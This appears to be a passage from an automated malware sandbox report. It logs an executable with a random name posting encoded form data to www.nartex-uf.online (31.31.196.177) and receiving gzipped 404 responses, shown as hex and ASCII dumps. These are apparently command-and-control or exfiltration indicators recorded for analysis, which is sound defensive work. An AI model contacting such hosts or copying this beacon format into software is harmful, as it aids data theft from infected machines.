                                                            Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                            Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                            Nov 24, 2024 08:14:01.222762108 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                            Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                            Nov 24, 2024 08:14:01.222786903 CET328INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                            Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                            Nov 24, 2024 08:14:01.223011017 CET1236INData Raw: 20 81 10 b8 f0 7b 92 4e 9d 21 ce c7 e6 62 5c 9f 34 82 54 0a d3 b7 85 d5 34 e5 3a 54 a9 e4 21 26 1a 08 cc 79 f4 d4 50 a5 99 91 54 cd 64 a9 c8 d5 24 cf a2 96 5d 91 5f a0 db e1 b3 22 a9 49 94 0c 85 14 a7 99 86 b0 08 57 bc 95 21 53 d3 86 da 58 2d cd
                                                            Data Ascii: {N!b\4T4:T!&yPTd$]_"IW!SX-Q-GXjYKY(<O4TB$?)H)%W6v]Y8G3WY:CP!;P~HV9xv9j'{Fg7b0x+La;9;dn$A<JGcUf%!?;
                                                            Nov 24, 2024 08:14:01.223114967 CET1236INData Raw: fa 9d c4 b1 99 f4 69 92 9e c9 a4 df 49 49 33 93 be 40 d1 93 9b f4 a5 04 b1 9b f4 3b f9 c1 64 d2 db 07 dd da df c6 a4 2f b4 e4 d9 4c fa 9d 9c 65 34 a7 d3 14 3d 97 49 bf 93 96 86 26 7d 91 a6 e7 33 e9 77 2b 6e 46 93 3e 43 d4 73 99 f4 ad 7b aa 2a b1
                                                            Data Ascii: iII3@;d/Le4=I&}3w+nF>Cs{*'a|g5[k?Ixbiog&}-f6LLbt&3ZIZ=uD$'|&Y=_I&?K[l?<e0(6{. =W;w
                                                            Nov 24, 2024 08:14:01.223134995 CET328INData Raw: b1 6a ae b6 3c c2 18 50 18 03 c7 40 a3 38 07 23 33 03 c7 2f 30 cd b5 ac 06 4a ee 35 62 5f e2 a8 4e fd 7d da 03 3c 53 6c e1 11 85 3b 27 51 6d 68 82 13 f8 d9 48 e5 da b3 66 66 f4 fd 65 8f f5 d4 1f 19 f6 84 e4 87 f8 cd 7a 9e 69 13 a1 9e 62 6c 72 20
                                                            Data Ascii: j<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\Al3% cUT_~7n7'q;cdfuAj0veVtM65qko3U`aR2J-)_>*
                                                            Nov 24, 2024 08:14:01.223221064 CET1236INData Raw: 4a 6b d0 81 9c aa 13 bd 93 28 55 27 7c 4f 55 46 c9 21 e4 2f c3 10 f8 b4 e7 fb 12 83 fe 7a 03 72 e9 c4 17 5f da b4 4e 66 6f 4a da 43 fc 92 ec ec 5b b1 cb 27 07 c6 f9 3b 1a de 9e 01 52 ed 13 ad 97 5b 76 39 c8 fb 35 a7 c9 32 7e 71 36 8a c3 54 20 39
                                                            Data Ascii: Jk(U'|OUF!/zr_NfoJC[';R[v952~q6T 9ITJG8e*c>Jk\[oc~sUZs/I~4|s`9w$`.{#I+?0<y;tn.0'~+H{RE'Q)\XpU<?/(
                                                            Nov 24, 2024 08:14:01.223293066 CET1236INData Raw: 6e 03 62 03 40 f9 b9 21 17 28 68 00 29 af 7a aa 36 30 32 1f 48 39 a8 61 cf 8c e4 b8 c1 d6 d6 46 de 1e 28 9e 33 ec 7a 00 83 9d 15 c7 51 03 b0 47 ed b7 a7 30 c9 9b c4 23 0f 60 88 ef 81 ee a9 a2 ad ad 6d 44 96 d0 e3 01 4c ed 06 68 8e 1d a8 7d 4a 96
                                                            Data Ascii: nb@!(h)z602H9aF(3zQG0#`mDLh}J}2!7x4aHfrXQu(31CvgFm1?\7!43aTUHsS!l\E0@1p)JTUowUM;JPU>EFl{Tml:mXc$yP
                                                            Nov 24, 2024 08:14:01.223310947 CET328INData Raw: 59 e3 33 8f 68 76 f6 cc cb 38 e8 7b 36 02 f2 23 9d 33 3a 92 75 fa 52 48 9a 52 9a 7e 86 79 ed c9 d3 d0 c4 84 81 8b ff 22 5d 1d 6b 72 a1 c1 1b 2a 2b a8 29 69 72 aa 95 9d 74 f3 cb 9a 8c 8d ed a4 5a 9f 6d 38 af 98 ab 8e d0 21 5f f8 d1 50 0b bf 4e 35
                                                            Data Ascii: Y3hv8{6#3:uRHR~y"]kr*+)irtZm8!_PN5RDHJMR/<uik~%|g7qW`/<cew9*`Pudm![=#tZ);WGo%I:RUy+`<!+
                                                            Nov 24, 2024 08:14:01.223397017 CET1236INData Raw: 6e ce 24 41 10 10 c1 ab af e5 77 00 71 6d 04 cb ce 5c 7f f5 97 a1 2a f3 a2 26 76 c4 b1 c4 cb 9a 3c 93 78 71 38 1a 0c 79 49 d5 3a 23 7e 34 1e c2 4c c5 ab 8a d2 11 35 7e a4 8c c3 5f bc 2a 8a a0 77 45 5e 10 55 5e 90 34 b8 52 f1 6a d8 91 79 59 95 a0
                                                            Data Ascii: n$Awqm\*&v<xq8yI:#~4L5~_*wE^U^4RjyY1TyUD3w$_c^beZGxi8k/(^h42W^"U|aS29!li#rw,"ci9"H3C5PCQG()~K%U=%{{EQ
                                                            Nov 24, 2024 08:14:01.342478991 CET1236INData Raw: 8b 8d 43 f7 e7 d1 11 94 2a 00 76 2e ad 38 98 e1 3b b5 27 91 f1 9b 2a 32 b7 3c 33 dc dd 17 9d 4f d9 f2 84 5f c5 26 46 fd 1e 15 90 2a 0a 48 51 01 b9 a2 80 1c 15 50 2a 0a 28 61 01 ee 22 e4 9d fe b5 a4 fd c7 c6 0d a6 30 a5 45 97 97 65 4f 87 f1 d3 32
                                                            Data Ascii: C*v.8;'*2<3O_&F*HQP*(a"0EeO2+;L?4-!<-N?Lmp80]f"+2XRChos4Rx&54!L*oM0Ye`PP0[G|;fiR"SPvN@


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.104989031.31.196.177806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:02.448090076 CET699OUTPOST /9ul0/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Origin: http://www.nartex-uf.online
                                                            Referer: http://www.nartex-uf.online/9ul0/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 67 4c 65 63 76 67 72 68 46 46 66 56 4f 6a 2f 79 67 77 33 37 52 7a 64 65 4f 44 6f 4f 78 6f 50 61 41 69 74 41 62 55 52 42 53 31 49 6b 65 35 69 31 78 65 35 68 37 68 35 77 72 78 50 7a 65 68 4a 72 6e 76 45 38 6a 7a 6c 2f 63 69 63 43 48 79 47 64 6f 37 44 2f 41 35 55 43 5a 58 42 6a 31 54 41 4a 4d 43 6e 61 57 68 36 48 79 30 78 72 2f 4b 56 71 63 44 74 7a 57 42 44 43 6b 66 58 2b 35 6e 4b 30 43 30 55 66 67 52 33 42 70 75 4f 46 30 57 48 7a 6b 77 4c 78 30 65 55 5a 6d 4c 78 65 52 6e 6c 43 6a 58 61 75 35 37 32 50 75 6d 42 72 55 4e 41 49 74 4f 6b 67 48 2f 77 71 39 75 4a 64 56 65 58 30 4a 72 47 31 6e 67 3d 3d
                                                            Data Ascii: 9HaD=y+M8hlRgYnlcgLecvgrhFFfVOj/ygw37RzdeODoOxoPaAitAbURBS1Ike5i1xe5h7h5wrxPzehJrnvE8jzl/cicCHyGdo7D/A5UCZXBj1TAJMCnaWh6Hy0xr/KVqcDtzWBDCkfX+5nK0C0UfgR3BpuOF0WHzkwLx0eUZmLxeRnlCjXau572PumBrUNAItOkgH/wq9uJdVeX0JrG1ng==
                                                            Nov 24, 2024 08:14:03.838325024 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                            Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                            Nov 24, 2024 08:14:03.838402033 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                            Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                            Nov 24, 2024 08:14:03.838454008 CET328INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                            Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                            Nov 24, 2024 08:14:03.838490009 CET1236INData Raw: 20 81 10 b8 f0 7b 92 4e 9d 21 ce c7 e6 62 5c 9f 34 82 54 0a d3 b7 85 d5 34 e5 3a 54 a9 e4 21 26 1a 08 cc 79 f4 d4 50 a5 99 91 54 cd 64 a9 c8 d5 24 cf a2 96 5d 91 5f a0 db e1 b3 22 a9 49 94 0c 85 14 a7 99 86 b0 08 57 bc 95 21 53 d3 86 da 58 2d cd
                                                            Data Ascii: {N!b\4T4:T!&yPTd$]_"IW!SX-Q-GXjYKY(<O4TB$?)H)%W6v]Y8G3WY:CP!;P~HV9xv9j'{Fg7b0x+La;9;dn$A<JGcUf%!?;
                                                            Nov 24, 2024 08:14:03.838521957 CET224INData Raw: fa 9d c4 b1 99 f4 69 92 9e c9 a4 df 49 49 33 93 be 40 d1 93 9b f4 a5 04 b1 9b f4 3b f9 c1 64 d2 db 07 dd da df c6 a4 2f b4 e4 d9 4c fa 9d 9c 65 34 a7 d3 14 3d 97 49 bf 93 96 86 26 7d 91 a6 e7 33 e9 77 2b 6e 46 93 3e 43 d4 73 99 f4 ad 7b aa 2a b1
                                                            Data Ascii: iII3@;d/Le4=I&}3w+nF>Cs{*'a|g5[k?Ixbiog&}-f6LLbt&3ZIZ=uD$'|&Y=_I&?K[l?<e0(6
                                                            Nov 24, 2024 08:14:03.838562012 CET1236INData Raw: 11 14 88 7b 2e af e0 20 3d 57 97 3b ff 93 f0 0e 0e d2 77 65 59 f9 9f d5 4b 38 88 26 a9 cb ac ff 49 78 0b 7b 4d 6c 85 f4 f6 ed bd 86 02 63 9e d9 73 28 6f cf b3 79 0f 6c a6 22 9b 07 51 9d bf 3f f6 17 14 91 79 53 cf a7 e1 2f d0 76 1c d8 5f 28 25 ee
                                                            Data Ascii: {. =W;weYK8&Ix{Mlcs(oyl"Q?yS/v_(%Y7_l}/R~ZLa)y@=F=ocRw<uQB)uahHc8iyDB!.fJ'?bu=HAaJ?Q
                                                            Nov 24, 2024 08:14:03.838598013 CET1236INData Raw: c7 a1 c4 52 32 0b e2 b2 9b 4a 0c 2d 96 e0 29 87 5f 3e 2a 64 7c 29 65 e1 fd 8d 40 82 35 ef e0 6a 54 28 b4 ad 16 8e ab 5e f0 98 6b 76 f4 5a 6d db 98 7d 88 de 29 19 2e 78 09 f4 cd d8 e5 15 d2 ef af 2c bc e3 34 37 68 3b 25 dc 22 0b 17 39 26 d4 19 03
                                                            Data Ascii: R2J-)_>*d|)e@5jT(^kvZm}).x,47h;%"9&a}{yivr&1D-Jk(U'|OUF!/zr_NfoJC[';R[v952~q6T 9ITJG8e*c>Jk\[oc~sUZ
                                                            Nov 24, 2024 08:14:03.838633060 CET1236INData Raw: fb d8 5a 92 37 83 8a 9d db d8 be 6b 85 b8 8d b9 73 50 c4 ec 56 50 13 b4 0d 19 5c 18 3d 8d 19 fc e4 8c 7d 2e 86 3e 89 95 c9 d6 b2 c8 5a 2b 76 75 63 a3 73 2f 84 fb db 11 07 41 c7 6e 58 b0 a1 0b 8d bb 1d dc 64 b1 50 f7 c1 77 6c 66 d6 63 3b 34 2f a9
                                                            Data Ascii: Z7ksPVP\=}.>Z+vucs/AnXdPwlfc;4/1XdeSsvlfd-10fnb@!(h)z602H9aF(3zQG0#`mDLh}J}2!7x4aHfrXQu(31CvgFm
                                                            Nov 24, 2024 08:14:03.838668108 CET432INData Raw: af 79 6f da d8 cb 65 21 18 21 d2 fe c9 5b 14 0a 70 58 72 f3 a6 a6 6b 3b 99 af 4b fb 29 cd db 8a b7 b7 88 c0 8c da 57 62 e4 19 9c 48 fe 4e c3 a0 bc a5 14 6d b3 b7 92 32 02 2c e5 52 24 ff f1 6b 42 8a 23 23 3b 84 4a 86 7b 5a 11 25 2f 7d dc 89 2a 7c
                                                            Data Ascii: yoe!![pXrk;K)WbHNm2,R$kB##;J{Z%/}*|A2INqIswRY3hv8{6#3:uRHR~y"]kr*+)irtZm8!_PN5RDHJMR/<uik~%|g7qW
                                                            Nov 24, 2024 08:14:03.838705063 CET1236INData Raw: 6e ce 24 41 10 10 c1 ab af e5 77 00 71 6d 04 cb ce 5c 7f f5 97 a1 2a f3 a2 26 76 c4 b1 c4 cb 9a 3c 93 78 71 38 1a 0c 79 49 d5 3a 23 7e 34 1e c2 4c c5 ab 8a d2 11 35 7e a4 8c c3 5f bc 2a 8a a0 77 45 5e 10 55 5e 90 34 b8 52 f1 6a d8 91 79 59 95 a0
                                                            Data Ascii: n$Awqm\*&v<xq8yI:#~4L5~_*wE^U^4RjyY1TyUD3w$_c^beZGxi8k/(^h42W^"U|aS29!li#rw,"ci9"H3C5PCQG()~K%U=%{{EQ
                                                            Nov 24, 2024 08:14:03.958226919 CET1236INData Raw: 8b 8d 43 f7 e7 d1 11 94 2a 00 76 2e ad 38 98 e1 3b b5 27 91 f1 9b 2a 32 b7 3c 33 dc dd 17 9d 4f d9 f2 84 5f c5 26 46 fd 1e 15 90 2a 0a 48 51 01 b9 a2 80 1c 15 50 2a 0a 28 61 01 ee 22 e4 9d fe b5 a4 fd c7 c6 0d a6 30 a5 45 97 97 65 4f 87 f1 d3 32
                                                            Data Ascii: C*v.8;'*2<3O_&F*HQP*(a"0EeO2+;L?4-!<-N?Lmp80]f"+2XRChos4Rx&54!L*oM0Ye`PP0[G|;fiR"SPvN@


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.104989731.31.196.177806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:05.118554115 CET1712OUTPOST /9ul0/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Origin: http://www.nartex-uf.online
                                                            Referer: http://www.nartex-uf.online/9ul0/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 67 4c 65 63 76 67 72 68 46 46 66 56 4f 6a 2f 79 67 77 33 37 52 7a 64 65 4f 44 6f 4f 78 6f 48 61 41 54 4e 41 55 58 35 42 63 56 49 6b 54 5a 69 32 78 65 35 67 37 68 77 33 72 77 7a 4a 65 6a 42 72 6d 4e 4d 38 6f 68 4e 2f 53 69 63 43 4f 53 47 65 31 4c 44 71 41 35 45 47 5a 58 52 6a 31 54 41 4a 4d 45 4c 61 55 30 4f 48 77 30 78 6f 76 61 56 6d 59 44 74 4c 57 42 62 53 6b 66 54 75 35 33 71 30 43 55 45 66 7a 33 6a 42 68 75 4f 4c 31 57 48 72 6b 33 44 59 30 61 39 67 6d 4a 52 67 52 6e 64 43 68 77 47 74 6c 6f 43 71 77 51 42 6f 65 39 6c 73 70 34 63 7a 41 65 78 2f 30 66 5a 31 48 61 54 71 44 70 50 47 6c 48 44 36 55 50 49 53 30 49 6d 66 62 45 32 67 65 2b 4d 6d 4d 4f 65 55 71 32 61 44 53 47 69 43 63 76 59 6f 78 49 78 35 45 67 71 32 78 49 4d 4e 33 36 6b 61 50 51 36 46 4c 5a 6d 65 67 4b 74 62 78 45 50 77 4d 45 50 47 2b 55 6c 4f 61 50 52 32 34 30 6a 65 47 73 2f 6d 65 36 41 41 61 76 4d 2b 6a 49 4f 54 7a 52 50 6f 4b 62 37 47 31 2f 34 52 64 30 4b 61 4c 32 30 41 72 66 72 30 77 [TRUNCATED]
                                                            Data Ascii: 9HaD=y+M8hlRgYnlcgLecvgrhFFfVOj/ygw37RzdeODoOxoHaATNAUX5BcVIkTZi2xe5g7hw3rwzJejBrmNM8ohN/SicCOSGe1LDqA5EGZXRj1TAJMELaU0OHw0xovaVmYDtLWBbSkfTu53q0CUEfz3jBhuOL1WHrk3DY0a9gmJRgRndChwGtloCqwQBoe9lsp4czAex/0fZ1HaTqDpPGlHD6UPIS0ImfbE2ge+MmMOeUq2aDSGiCcvYoxIx5Egq2xIMN36kaPQ6FLZmegKtbxEPwMEPG+UlOaPR240jeGs/me6AAavM+jIOTzRPoKb7G1/4Rd0KaL20Arfr0wk5DaxBUOI//kCKA8uzDH9AvnCHA6ANTGYxb9yugeAhKqgIfadXRFRmEa0rqy8sAnyXtFlriXA9L9fqRDERcQ0m1WurOL7kLUYXedQmA+B8vCFdJ2a6gVvsssTP4exVpHe+MBMZQNBlHupavRH2XaxfRvqJNTjfZhkeIMuKhlhkRhwQaxvL6/5hxKufubIgbftS9iXoSSPYb5CV3nrB151B4tZ4tJLNVEC0wsvLK7A60/ix8fcaDhxEViUcN0ZxVdJZrvOJrpPCa7MskK1Cpk2LWpkvlSoVb/oaw3ds5txyTL2C+yCptnBh1pLvFK68hhU5sZJkghTHOho7+xBWRE2zefJzN+tQ4V9JckFNNasSXmc2k2hTLHxlBp6TQsy+gl3cyvhbbVMcseR0S/lccYLCujgMuisVQgTTIw23dcUSUz1eQ6KJ4OAMXEnGd8rKb0NfA9TdvuomyIJ58QQyebgMt8iTg1tcIvQRKbcWL4lkXa3QQTISgn/pIck72HR4SQH/pBh4N5bRPeJEUm7XqHl4OvjkLjwTbvN2nptBb6STu4BuxnlJvJmIBXM7DHDCLlEIjHcnmDCLcTNgSKE64fKUuyItV0Hy5o/bIumjEbFtQp6t5TxPsQ03KdIAIInftFKzwVOyGqOQkVk5yJQx0xW8ZcNLgZINgQsS [TRUNCATED]
                                                            Nov 24, 2024 08:14:06.686919928 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:06 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                            Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                            Nov 24, 2024 08:14:06.686948061 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                            Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                            Nov 24, 2024 08:14:06.686960936 CET328INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                            Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                            Nov 24, 2024 08:14:06.687227964 CET1236INData Raw: 20 81 10 b8 f0 7b 92 4e 9d 21 ce c7 e6 62 5c 9f 34 82 54 0a d3 b7 85 d5 34 e5 3a 54 a9 e4 21 26 1a 08 cc 79 f4 d4 50 a5 99 91 54 cd 64 a9 c8 d5 24 cf a2 96 5d 91 5f a0 db e1 b3 22 a9 49 94 0c 85 14 a7 99 86 b0 08 57 bc 95 21 53 d3 86 da 58 2d cd
